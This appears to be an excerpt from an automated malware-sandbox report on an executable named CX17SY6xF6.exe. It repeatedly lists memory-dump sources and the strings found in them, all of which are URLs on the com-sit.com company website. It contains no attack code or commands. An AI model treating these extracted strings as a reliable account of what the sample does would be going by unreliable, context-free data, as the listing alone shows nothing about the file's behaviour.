                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/intelligent-sourcing/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/karriere/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/kontakt/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/logistics/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/management/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/marketing/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/personal-stories/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/remarking-test/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/rohs-test/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/sales/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/send-us-your-bom/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/serviceleistungen-loesungen/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/soldering-test/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/temptest/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/testhouse/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ueberbestaende/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-logo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unser-team/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/unternehmensethik/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/ursprung/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/usa/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/visual-inspection/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/warenpruefung-lagerung/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/4.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/C1.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1024x222.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-1536x334.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-300x65.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit-768x167.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/Comsit.png
